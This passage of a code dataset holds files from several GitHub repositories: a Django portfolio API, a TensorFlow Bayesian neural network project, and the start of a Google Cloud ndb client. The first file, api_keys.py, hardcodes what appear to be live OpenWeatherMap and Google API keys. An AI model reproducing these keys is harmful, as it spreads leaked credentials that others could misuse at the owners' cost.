[ { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.75, "avg_line_length": 21.399999618530273, "blob_id": "52e24e68ce3063405e1a76acda267faedec912fc", "content_id": "44896f5eeaa8a13ed91a870256480df7eb1039d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 112, "license_type": "no_license", "max_line_length": 52, "num_lines": 5, "path": "/starter_code/api_keys.py", "repo_name": "andyhyshi/Weather-Changes", "src_encoding": "UTF-8", "text": "# OpenWeatherMap API Key\nweather_api_key = \"6956968996d9e0c5c5a9bac119faa2e7\"\n\n# Google API Key\ng_key = \"AIzaSyDvdrUOBRkNKwWnuOOQR6wEJER3I25tAUA\"\n" } ]
1
chromebanana/django-portfolio
https://github.com/chromebanana/django-portfolio
94ce44dfb484b668556c972f6fc9b9b777cfdb63
731ef750029d7c8a64be13949c39a3a58900ed7b
073953e5f64a873ab0465abf71ecc305c5c25d7a
refs/heads/master
2022-12-30T17:36:55.325872
2020-10-14T14:23:13
2020-10-14T14:23:13
303,795,095
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7998046875, "alphanum_fraction": 0.7998046875, "avg_line_length": 30.060606002807617, "blob_id": "ea0e6771264132a848bef4e828ddcc899005c088", "content_id": "e3df867a2d1487af48dfa6461ddca1c47f97be23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1024, "license_type": "no_license", "max_line_length": 67, "num_lines": 33, "path": "/articles/api/views.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "from rest_framework.generics import ListAPIView, RetrieveAPIView\nfrom drf_multiple_model.views import ObjectMultipleModelAPIView\n\nfrom articles.models import Professional, Qualification\nfrom .serializers import ArticleSerializer, QualificationSerializer\n\nclass ArticleAPIView(ObjectMultipleModelAPIView):\n\tquerylist = [\n\t\t{\n\t\t\t'queryset' : Professional.objects.all(),\n\t\t\t'serializer_class' : ArticleSerializer\n\t\t},\n\t\t{\n\t\t\t'queryset' : Qualification.objects.all(),\n\t\t\t'serializer_class' : QualificationSerializer\n\t\t}\n\t]\n\nclass ArticleListView(ListAPIView):\n\tqueryset = Professional.objects.all()\n\tserializer_class = ArticleSerializer\n\nclass ArticleDetailView(RetrieveAPIView):\n\tqueryset = Professional.objects.all()\n\tserializer_class = ArticleSerializer\n\n# class QualificationListView(ListAPIView):\n# \tqueryset = Qualification.objects.all()\n# \tserializer_class = QualificationSerializer\n\n# class QualificationDetailView(RetrieveAPIView):\n# \tqueryset = Qualification.objects.all()\n# \tserializer_class = QualificationSerializer" }, { "alpha_fraction": 0.4798206388950348, "alphanum_fraction": 0.5313901305198669, "avg_line_length": 30.85714340209961, "blob_id": "9989a5b60ef9542d3a9ef44a837b69065eaf2153", "content_id": "c3c59d0065e37fd33f05b81a9a41652465666c2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 892, "license_type": "no_license", "max_line_length": 114, "num_lines": 28, "path": "/articles/migrations/0003_qualification.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "# Generated by Django 3.1.2 on 2020-10-14 10:11\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articles', '0002_auto_20201014_0953'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Qualification',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('location', models.CharField(max_length=120)),\n ('date', models.CharField(max_length=120)),\n ('body', models.TextField()),\n ('role', models.CharField(max_length=120)),\n ('institution', models.CharField(max_length=120)),\n ('grade', models.CharField(max_length=120)),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n" }, { "alpha_fraction": 0.8026315569877625, "alphanum_fraction": 0.8026315569877625, "avg_line_length": 29.200000762939453, "blob_id": "fff0e5b43c6540cf809bf0d2ec0931e6a3ec3a08", "content_id": "8b0495fc6037f99c67bddf77a6c44fdea493bec7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 100, "num_lines": 5, "path": "/README.md", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "This project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app).\n\ndjango backend\nreact frontend\ndeployed on heroku\n\n" }, { "alpha_fraction": 0.8421052694320679, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 24.33333396911621, "blob_id": "538e005a6cecc6fab3555a806bd0ade08013e283", "content_id": "1f8a7fcef8cb9ec4ef27dacc11a150068cda3b98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "no_license", "max_line_length": 47, "num_lines": 6, "path": "/articles/admin.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom .models import Professional, Qualification\n\nadmin.site.register(Professional)\nadmin.site.register(Qualification)\n" }, { "alpha_fraction": 0.773413896560669, "alphanum_fraction": 0.773413896560669, "avg_line_length": 24.538461685180664, "blob_id": "77a2e486dd50bc17cdacc094757c9f92f3971bcd", "content_id": "3605737baf5395e54af7b7d55d3bd8813b06e769", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 59, "num_lines": 13, "path": "/articles/api/serializers.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\n\nfrom articles.models import Professional, Qualification\n\nclass ArticleSerializer(serializers.ModelSerializer):\n\tclass Meta:\n\t\tmodel = Professional\n\t\tfields = (\"__all__\")\n\t\nclass QualificationSerializer(serializers.ModelSerializer):\n\tclass Meta:\n\t\tmodel = Qualification\n\t\tfields = (\"__all__\")" }, { "alpha_fraction": 0.7166666388511658, "alphanum_fraction": 0.75, "avg_line_length": 22.521739959716797, "blob_id": "aaf0e5bb513ef5e68f640d747b0d8c4a8331093b", "content_id": "0cab660884d4254db9b478b70ec7a9e4ea6fe5e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 540, "license_type": "no_license", "max_line_length": 48, "num_lines": 23, "path": "/articles/models.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass Article(models.Model):\n\tlocation = models.CharField(max_length=120)\n\tdate = models.CharField(max_length=120)\n\tbody = models.TextField()\n\n\tclass Meta:\n\t\tabstract = True\n\nclass Professional(Article):\n\trole = models.CharField(max_length=120)\n\torganisation = models.CharField(max_length=120)\n\n\tdef __str__(self):\n\t\treturn self.organisation\n\nclass Qualification(Article):\n\tinstitution = models.CharField(max_length=120)\n\tgrade = models.CharField(max_length=120) \n\n\tdef __str__(self):\n\t\treturn self.institution" } ]
6
vie2bgd/bayesianNN
https://github.com/vie2bgd/bayesianNN
5aa605334aecf6e2d84ec9d73438404b231e03e7
7d7b8490037b215b6843dbeed52f0e95e7381c6b
7988769616da952e8c038d999f98ea63562d4ca0
refs/heads/master
2021-09-15T01:52:46.646406
2018-05-23T20:07:20
2018-05-23T20:07:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6643538475036621, "alphanum_fraction": 0.6895056366920471, "avg_line_length": 33.969696044921875, "blob_id": "7a59a0eae2a4c9bed878dadfddac01fe76a2e84b", "content_id": "7dd80f661133d474bdd61f712156b06ee9ce7d78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1153, "license_type": "no_license", "max_line_length": 107, "num_lines": 33, "path": "/datamanipulation.py", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\n\ndata = pd.read_csv(\"variables.csv.txt\", sep='\\t')\n\n# last column is the response variable\ny = np.array(data[data.columns[-1]], dtype='float32')\n# rest of the variables (except the first) are the features\nx = np.array(data[data.columns[1:-1]], dtype='float32')\n\n# since x_6850 -> x_6908 has variance 0 they don't contribute to our mapping, therefore we remove them here\nx = x[0:len(x), 0:6849]\n\nprint(\"Original data dimensions:\", x.shape)\n\n# Remove varuables with 100% correlation with another one\ncorr_matrix = np.corrcoef(np.transpose(x))\n\nvar_to_remove = []\nprint(\"Checking for full correlation...\")\nfor i in range(corr_matrix.shape[0]):\n for j in range(corr_matrix.shape[1]):\n if j <= i:\n continue # since symmetry\n elif abs(corr_matrix[i][j]) == 1 & j not in var_to_remove:\n var_to_remove.append(i)\n\n# print(var_to_remove)\nx = np.delete(x, var_to_remove, axis=1) # removing variables that are fully correlated with another one\nprint(\"New dimension:\", x.shape)\n\n# save the data to local file to be loaded later for training\nnp.savez('drug_data.npz', features=x, labels=y)" }, { "alpha_fraction": 0.6613546013832092, "alphanum_fraction": 0.6677500605583191, "avg_line_length": 42.75688171386719, "blob_id": "2ac286f9c713e9b4827e973b4b2d9260ff338edc", "content_id": "a92539ac5c25c248c6bbe0f7e211156c6620c4b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9538, "license_type": "no_license", "max_line_length": 118, "num_lines": 218, "path": "/finalmodel.py", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Dependencies\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport math\nfrom flags import *\nfrom utils import *\nfrom sklearn.decomposition import PCA\n\ntfd = tf.contrib.distributions\n\n# Tuning program settings\nFLAGS = flags.FLAGS\nFLAGS.learning_rate = 0.09 # change\nFLAGS.num_hidden_layers = 7\nFLAGS.num_neurons_per_layer = 3\nFLAGS.activation_function = \"sigmoid\"\nFLAGS.num_principal_components = 369\nFLAGS.batch_size = 44 # kept constant under hyperopt\nFLAGS.num_epochs = 10000 # kept constant under hyperopt\n\nTRAIN_PERCENTAGE = 0.8\n\ndef build_input_pipeline(drug_data_path, batch_size,\n number_of_principal_components):\n \"\"\"Build an Iterator switching between train and heldout data.\n Args:\n `drug_data`: string representing the path to the .npy dataset.\n `batch_size`: integer specifying the batch_size for the dataset.\n `number_of_principal_components`: integer specifying how many principal components\n to reduce the dataset into.\n \"\"\"\n # Build an iterator over training batches.\n with np.load(drug_data_path) as data:\n features = data[\"features\"]\n labels = data[\"labels\"]\n\n # PCA (sklearn)\n features = PCA(n_components=number_of_principal_components).fit_transform(features)\n\n # Splitting into training and validation sets\n train_range = int(TRAIN_PERCENTAGE * len(features))\n\n training_features = features[:train_range]\n training_labels = labels[:train_range]\n validation_features = features[train_range:]\n validation_labels = labels[train_range:]\n\n # Z-normalising: (note with respect to training data)\n training_features = (training_features - np.mean(training_features, axis=0))/np.std(training_features, axis=0)\n validation_features = (validation_features - np.mean(training_features, axis=0))/np.std(training_features, axis=0)\n\n # Create the tf.Dataset object\n training_dataset = tf.data.Dataset.from_tensor_slices((training_features, training_labels))\n\n # Shuffle the dataset (note shuffle argument much larger than training size)\n # and form batches of size `batch_size`\n training_batches = training_dataset.shuffle(20000).repeat().batch(batch_size)\n training_iterator = training_batches.make_one_shot_iterator()\n\n # Build a iterator over the heldout set with batch_size=heldout_size,\n # i.e., return the entire heldout set as a constant.\n heldout_dataset = tf.data.Dataset.from_tensor_slices(\n (validation_features, validation_labels))\n heldout_frozen = (heldout_dataset.take(len(validation_features)).\n repeat().batch(len(validation_features)))\n heldout_iterator = heldout_frozen.make_one_shot_iterator()\n\n # Combine these into a feedable iterator that can switch between training\n # and validation inputs.\n # Here should the minibatch increment be defined \n handle = tf.placeholder(tf.string, shape=[])\n feedable_iterator = tf.data.Iterator.from_string_handle(\n handle, training_batches.output_types, training_batches.output_shapes)\n features_final, labels_final = feedable_iterator.get_next()\n\n return features_final, labels_final, handle, training_iterator, heldout_iterator, train_range\n\n\ndef main(argv):\n # extract the activation function from the hyperopt spec as an attribute from the tf.nn module\n activation = getattr(tf.nn, FLAGS.activation_function)\n\n # define the graph\n with tf.Graph().as_default():\n (features, labels, handle,\n training_iterator, heldout_iterator, train_range) = build_input_pipeline(\n \"drug_data.npz\", FLAGS.batch_size, FLAGS.num_principal_components)\n\n # Building the Bayesian Neural Network. \n # We are here using the Gaussian Reparametrization Trick\n # to compute the stochastic gradients as described in the paper\n with tf.name_scope(\"bayesian_neural_net\", values=[features]):\n neural_net = tf.keras.Sequential()\n for i in range(FLAGS.num_hidden_layers):\n layer = tfp.layers.DenseReparameterization(\n units=FLAGS.num_neurons_per_layer,\n activation=activation,\n trainable=True,\n kernel_prior_fn=default_multivariate_normal_fn, # NormalDiag with hyperopt sigma\n kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(), # softplus(sigma)\n kernel_posterior_tensor_fn=lambda x: x.sample(),\n bias_prior_fn=default_multivariate_normal_fn, # NormalDiag with hyperopt sigma\n bias_posterior_fn=tfp.layers.default_mean_field_normal_fn(), # softplus(sigma)\n bias_posterior_tensor_fn=lambda x: x.sample()\n )\n neural_net.add(layer)\n neural_net.add(tfp.layers.DenseReparameterization(\n units=1, # one dimensional output\n activation=None, # since regression (outcome not bounded)\n trainable=True, # i.e subject to optimization\n kernel_prior_fn=default_multivariate_normal_fn, # NormalDiag\n kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(), # softplus(sigma)\n kernel_posterior_tensor_fn=lambda x: x.sample(),\n bias_prior_fn=default_multivariate_normal_fn, # NormalDiag\n bias_posterior_fn=tfp.layers.default_mean_field_normal_fn(), # softplus(sigma)\n bias_posterior_tensor_fn=lambda x: x.sample()\n ))\n predictions = neural_net(features)\n\n preds = []\n for _ in range(1000):\n preds.append(neural_net(features))\n\n MAP, var = tf.nn.moments(tf.squeeze(preds), axes=[0])\n \n # Compute the -ELBO as the loss, averaged over the batch size.\n neg_log_likelihood = tf.reduce_mean(tf.squared_difference(labels, predictions))\n kl = sum(neural_net.losses) / FLAGS.batch_size\n elbo_loss = kl + neg_log_likelihood\n\n # Build metrics for evaluation. Predictions are formed from a single forward\n # pass of the probabilistic layers. They are cheap but noisy predictions.\n accuracy, accuracy_update_op = tf.metrics.mean_squared_error(\n labels=labels, predictions=predictions)\n\n with tf.name_scope(\"train\"):\n # define optimizer - we are using (stochastic) gradient descent\n opt = tf.train.GradientDescentOptimizer(learning_rate=FLAGS.learning_rate)\n\n # define that we want to minimize the loss (-ELBO)\n train_op = opt.minimize(elbo_loss)\n # start the session\n sess = tf.Session()\n # initialize the variables\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n\n # Run the training loop\n train_handle = sess.run(training_iterator.string_handle())\n heldout_handle = sess.run(heldout_iterator.string_handle())\n \n # Run the epochs\n for epoch in range(FLAGS.num_epochs):\n _ = sess.run([train_op, accuracy_update_op],\n feed_dict={handle: train_handle})\n \n if epoch % 100 == 0:\n loss_value, accuracy_value = sess.run(\n [elbo_loss, accuracy], feed_dict={handle: train_handle})\n loss_value_validation, accuracy_value_validation = sess.run(\n [elbo_loss, accuracy], feed_dict={handle: heldout_handle}\n )\n print(\"Epoch: {:>3d} Loss: [{:.3f}, {:.3f}] Accuracy: [{:.3f}, {:.3f}]\".format(\n epoch, loss_value, loss_value_validation, accuracy_value, accuracy_value_validation))\n\n # Check if final epoch, if so return the validation loss for the last epoch \n if epoch == FLAGS.num_epochs-1:\n final_loss, final_accuracy = sess.run(\n [elbo_loss, accuracy], feed_dict={handle: heldout_handle}\n )\n print(\"Final loss: [{:.3f}, {:.3f}] Final accuracy: [{:.3f}, {:.3f}]\".format(\n loss_value, loss_value_validation, accuracy_value, accuracy_value_validation))\n\n with tf.name_scope(\"evaluate\"):\n # interpolate the predictive distributions and get the percentiles to represent\n # an empirical credible interval for the predictions\n\n predictions = np.asarray([sess.run(predictions,\n feed_dict={handle: heldout_handle})\n for _ in range(FLAGS.num_monte_carlo)])\n\n predictions = np.squeeze(predictions) # fix the dimensions into a flat matrix\n credible_intervals = [] # will be a matrix with with lower- and upper bound as columns\n # loop over the columns and compute the empirical credible interval\n modes = []\n for i in range(predictions.shape[1]):\n lb = np.percentile(predictions[:,i], 2.5)\n ub = np.percentile(predictions[:,i], 97.5)\n mode = np.mean(predictions[:,i])\n credible_intervals.append([lb, ub])\n modes.append(mode)\n\n # check how often the true vale is inside the credible interval\n with np.load(\"drug_data.npz\") as data:\n labels = data[\"labels\"]\n features = data[\"features\"]\n train_range = int(TRAIN_PERCENTAGE * len(features))\n validation_labels = labels[train_range:]\n\n inside = 0\n SSE = 0\n for i in range(validation_labels.shape[0]):\n label = validation_labels[i]\n if label >= credible_intervals[i][0] and label <= credible_intervals[i][1]:\n inside += 1\n SSE += (label - modes[i])**2\n\n print(\"MSE\", SSE/validation_labels.shape[0])\n print(inside/validation_labels.shape[0])\n\n\nif __name__ == \"__main__\":\n tf.app.run()" }, { "alpha_fraction": 0.6796407103538513, "alphanum_fraction": 0.699999988079071, "avg_line_length": 28.3157901763916, "blob_id": "64c17a9e8cdc6bd26635bb16331cd426a6ade907", "content_id": "7e884ee9c26147888f98bdb2f3f3c72024e29597", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1670, "license_type": "no_license", "max_line_length": 70, "num_lines": 57, "path": "/flags.py", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "from absl import flags\nimport os\n\nflags.DEFINE_string(\"data_dir\",\n default=os.path.join(os.getenv(\"TEST_TMPDIR\", \"/tmp\"),\n \"bayesian_neural_network/data\"),\n help=\"Directory where data is stored (if using real data).\")\n\nflags.DEFINE_string(\"model_dir\",\n default=os.path.join(os.getenv(\"TEST_TMPDIR\", \"/tmp\"),\n \"bayesian_neural_network/\"),\n help=\"Directory to put the model's fit.\")\n\nflags.DEFINE_float(\"learning_rate\",\n default=0.01,\n help=\"Initial learning rate.\")\n\nflags.DEFINE_integer(\"max_epochs\",\n default=6000,\n help=\"Number of training epochs to run.\")\n\nflags.DEFINE_integer(\"num_hidden_layers\",\n default=2,\n help=\"Number of hidden layers\")\n\nflags.DEFINE_integer(\"num_neurons_per_layer\",\n default=50,\n help=\"Number of neurons per hidden layer\")\n\nflags.DEFINE_list(\"layer_sizes\",\n default=[\"128\", \"128\", \"128\"],\n help=\"Comma-separated list denoting hidden units per layer.\")\n\nflags.DEFINE_string(\"activation_function\",\n default=\"relu\",\n help=\"Activation function for all hidden layers.\")\n\nflags.DEFINE_integer(\"batch_size\",\n default=44,\n help=\"Batch size. Must divide evenly into dataset sizes.\")\n\nflags.DEFINE_integer(\"num_monte_carlo\",\n default=10000,\n help=\"Network draws to compute predictive probabilities.\")\n\n\nflags.DEFINE_integer(\"num_epochs\",\n default=10000,\n help=\"Number of epochs to run the training for.\")\n\nflags.DEFINE_string(\"hyperparams_dir\",\n default=\"hyperparams.json\",\n help=\"Directory to the json for the hyperparameters\")\n\nflags.DEFINE_integer(\"num_principal_components\",\n default=200,\n help=\"Number of principal components to reduce the dataset into.\")" }, { "alpha_fraction": 0.7119265794754028, "alphanum_fraction": 0.7137614488601685, "avg_line_length": 37.96428680419922, "blob_id": "24528561ab0d1535e84e18981ec373024ee01c18", "content_id": "a368a88a90b2da5577832d1d59ad4f3cdc795cac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1090, "license_type": "no_license", "max_line_length": 76, "num_lines": 28, "path": "/utils.py", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "# Dependencies\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nimport math\nimport json\n\ntfd = tf.contrib.distributions\n\ndef default_multivariate_normal_fn(dtype, shape, name, trainable,\n add_variable_fn):\n \"\"\"Creates multivariate standard `Normal` distribution.\n Args:\n dtype: Type of parameter's event.\n shape: Python `list`-like representing the parameter's event shape.\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n Returns:\n Multivariate standard `Normal` distribution.\n \"\"\"\n del name, trainable, add_variable_fn # unused\n dist = tfd.Normal(loc=tf.zeros(shape, dtype), scale=1.0)\n batch_ndims = tf.size(dist.batch_shape_tensor())\n return tfd.Independent(dist, reinterpreted_batch_ndims=batch_ndims)" }, { "alpha_fraction": 0.4333333373069763, "alphanum_fraction": 0.7066666483879089, "avg_line_length": 17.75, "blob_id": "6963663aa415f40cc081384b78caad8cd02287f1", "content_id": "b78ff662d76f131ae10d7d8bda7a2379e842ded7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 150, "license_type": "no_license", "max_line_length": 30, "num_lines": 8, "path": "/requirements.txt", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "absl_py==0.2.0\nhyperopt==0.1\ntfp_nightly==0.0.1.dev20180426\nnumpy==1.14.2\ntf_nightly==1.9.0.dev20180425\npandas==0.22.0\nabsl==0.0\nscikit_learn==0.19.1\n" }, { "alpha_fraction": 0.821689248085022, "alphanum_fraction": 0.821689248085022, "avg_line_length": 105.55555725097656, "blob_id": "b1cea75424fac7fc9924d3bba4078a97ef2d3709", "content_id": "735d41804a110608fc393d120730704de4298dc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 959, "license_type": "no_license", "max_line_length": 476, "num_lines": 9, "path": "/README.md", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "# Bayesian Neural Network with TensorFlow\n\nThis repository regards the implementation of Bayesian Artificial Neural Networks as described in my thesis. Central for the implementation was the module [TensorFlow Probability](https://github.com/tensorflow/probability \"TensorFlow Probability Repository\"), where much of our technical work was inspired by [Dustin Tran's demo example](https://github.com/tensorflow/probability/blob/master/tensorflow_probability/examples/bayesian_neural_network.py \"bayesian_neural_network.py\").\n\nThe repository is mainly structured as follows:\\\n[Requirements](https://github.com/csamuelsson/bayesianNN/blob/master/requirements.txt)\\\n[Data pre-processing](https://github.com/csamuelsson/bayesianNN/blob/master/datamanipulation.py)\\\n[Hyperparameter optimisation](https://github.com/csamuelsson/bayesianNN/blob/master/bayesianNN.py)\\\n[Get metrics for the final model](https://github.com/csamuelsson/bayesianNN/blob/master/finalmodel.py)\n" } ]
6
MonicaRizzolli/waveCollapseFunction
https://github.com/MonicaRizzolli/waveCollapseFunction
e49c39d715db60b97d34e8a4132242f8ba24f71b
c38522ecc75a208fa829ca3e1f7195ea32af4488
8e79a226001863be24634484e138cfe3527c464c
refs/heads/master
2023-07-01T18:40:46.900202
2021-08-03T12:26:36
2021-08-03T12:26:36
246,406,294
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5472736358642578, "alphanum_fraction": 0.5670335292816162, "avg_line_length": 30.690475463867188, "blob_id": "c8f9d5eeb729de1975b599e9a886c82c8747f2ab", "content_id": "434d4817c34fc54d469aaeca372f7668d644e270", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4008, "license_type": "no_license", "max_line_length": 125, "num_lines": 126, "path": "/waveCollapseOverlaping.pyde", "repo_name": "MonicaRizzolli/waveCollapseFunction", "src_encoding": "UTF-8", "text": "# Este sketch é baseado no post: Wave Collapse Function algorithm in Processing\n# Publicado no dia 5 de julho de 2019 no Discourse - Processing Foundation\n# https://discourse.processing.org/t/wave-collapse-function-algorithm-in-processing/12983\n# Customizado por Monica Rizzolli para gerar output em PDF, salvar png e rodar suave no processing modo Phyton\n# Versão: Overlapping model\n\nadd_library('pdf')\nfrom collections import Counter\nfrom itertools import chain\nfrom random import choice, sample\n\nout_w, out_h = 60, 60 \nf = 12\nN = 3\n\ndef setup():\n beginRecord(PDF, \"nome.pdf\")\n size(out_w*f, out_h*f, P2D)\n background(255)\n noStroke()\n\n global wave, adjacencies, entropy, directions, patterns, freqs, cell_w, cell_h\n\n img = loadImage('wave10A.png') \n img_w, img_h = img.width, img.height \n cell_w, cell_h = width//out_w, height//out_h \n kernel = tuple(tuple(i + n*img_w for i in xrange(N)) for n in xrange(N)) \n directions = ((-1, 0), (1, 0), (0, -1), (0, 1)) \n all = [] \n\n for y in xrange(img_h):\n for x in xrange(img_w):\n \n cmat = tuple(tuple(img.pixels[((x+n)%img_w)+(((a[0]+img_w*y)/img_w)%img_h)*img_w] for n in a) for a in kernel)\n \n # Padrões rotacionados (90°, 180°, 270°, 360°)\n for r in xrange(4):\n cmat = zip(*cmat[::-1]) # +90°\n all.append(cmat)\n all.append(cmat[::-1]) # reflexão vertical \n all.append([a[::-1] for a in cmat]) # reflexão horizontal \n\n\n all = [tuple(chain.from_iterable(p)) for p in all]\n c = Counter(all) \n freqs = c.values() \n patterns = c.keys() \n npat = len(freqs) \n\n wave = dict(enumerate(tuple(set(range(npat)) for i in xrange(out_w*out_h))))\n\n entropy = dict(enumerate(sample(tuple(npat if i > 0 else npat-1 for i in xrange(out_w*out_h)), out_w*out_h)))\n\n adjacencies = dict(enumerate(tuple(set() for dir in xrange(len(directions))) for i in xrange(npat))) # explanations below\n\n '''\n 0 = esquerda\n 1 = direita\n 2 = em cima\n 3 = em baixo\n '''\n \n for i1 in xrange(npat):\n for i2 in xrange(npat):\n\n if [n for i, n in enumerate(patterns[i1]) if i%N!=(N-1)] == [n for i, n in enumerate(patterns[i2]) if i%N!=0]:\n adjacencies[i1][0].add(i2)\n adjacencies[i2][1].add(i1)\n\n if patterns[i1][:(N*N)-N] == patterns[i2][N:]:\n adjacencies[i1][2].add(i2)\n adjacencies[i2][3].add(i1)\n\ndef draw():\n global entropy, wave, tecla\n print(frameCount)\n\n if not entropy:\n endRecord()\n print 'finished'\n noLoop()\n return\n\n entropy_min = min(entropy, key = entropy.get)\n\n pattern_id = choice([pattern_idx for pattern_idx in wave[entropy_min] for i in xrange(freqs[pattern_idx])]) \n\n wave[entropy_min] = {pattern_id}\n\n del entropy[entropy_min]\n\n stack = {entropy_min}\n\n while stack:\n\n cell_idx = stack.pop() # index of current cell\n for dir, t in enumerate(directions):\n x = (cell_idx%out_w + t[0])%out_w\n y = (cell_idx/out_w + t[1])%out_h\n neighbor_idx = x + y * out_w # index of negihboring cell\n\n if neighbor_idx in entropy:\n\n possible = {n for pattern_idx in wave[cell_idx] for n in adjacencies[pattern_idx][dir]}\n\n available = wave[neighbor_idx]\n\n if not available.issubset(possible):\n\n intersection = possible & available\n\n if not intersection:\n print 'contradiction'\n noLoop()\n return\n\n wave[neighbor_idx] = intersection\n\n entropy[neighbor_idx] = len(wave[neighbor_idx]) - random(.1)\n\n stack.add(neighbor_idx)\n\n fill(patterns[pattern_id][0])\n rect((entropy_min%out_w) * cell_w, (entropy_min/out_w) * cell_h, cell_w, cell_h)\n\n saveFrame(\"#######waveCF.png\")\n \n" }, { "alpha_fraction": 0.7731629610061646, "alphanum_fraction": 0.7891373634338379, "avg_line_length": 38.125, "blob_id": "c8bc8440ac6629dfca91e5b37a293d0fbed1879b", "content_id": "ae6974aac3e4aec7de20441fda94ca612e474e3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 317, "license_type": "no_license", "max_line_length": 173, "num_lines": 8, "path": "/README.md", "repo_name": "MonicaRizzolli/waveCollapseFunction", "src_encoding": "UTF-8", "text": "# *Wave Function Collapse*\n## Overlapping model ##\n\nI forked this code from the post “Wave Collapse Function” algorithm in Processing\" : https://discourse.processing.org/t/wave-collapse-function-algorithm-in-processing/12983\n\nGenerate procedural patterns from a sample image. \n\nPorted to Processing Phyton mode.\n" } ]
2
yeaat/google-cloud-python
https://github.com/yeaat/google-cloud-python
9f9b1049cc3ff3ec0290a22e0cbfa034f08d3cc8
29fba13510e6d41df67dbc44807573f3bdebe379
1fb485f3b99c4312df7a20135a8516bf5887087a
refs/heads/master
2020-04-12T18:11:42.047931
2018-12-20T18:36:32
2018-12-20T18:36:32
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.693829357624054, "alphanum_fraction": 0.6976675391197205, "avg_line_length": 33.56122589111328, "blob_id": "702c421e52ee3aa6fa0a7c475e689818759d8006", "content_id": "a8c455b81ba6764c18774c1a392c02a55dee4dea", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3387, "license_type": "permissive", "max_line_length": 79, "num_lines": 98, "path": "/ndb/src/google/cloud/ndb/client.py", "repo_name": "yeaat/google-cloud-python", "src_encoding": "UTF-8", "text": "# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"A client for NDB which manages credentials, project, namespace.\"\"\"\n\nimport os\n\nfrom google.cloud import environment_vars\nfrom google.cloud import _helpers\nfrom google.cloud import client as google_client\nfrom google.cloud.datastore_v1.gapic import datastore_client\n\nDATASTORE_API_HOST = datastore_client.DatastoreClient.SERVICE_ADDRESS.rstrip(\n \":443\"\n)\n\n\ndef _get_gcd_project():\n \"\"\"Gets the GCD application ID if it can be inferred.\"\"\"\n return os.getenv(environment_vars.GCD_DATASET)\n\n\ndef _determine_default_project(project=None):\n \"\"\"Determine default project explicitly or implicitly as fall-back.\n\n In implicit case, supports four environments. In order of precedence, the\n implicit environments are:\n\n * DATASTORE_DATASET environment variable (for ``gcd`` / emulator testing)\n * 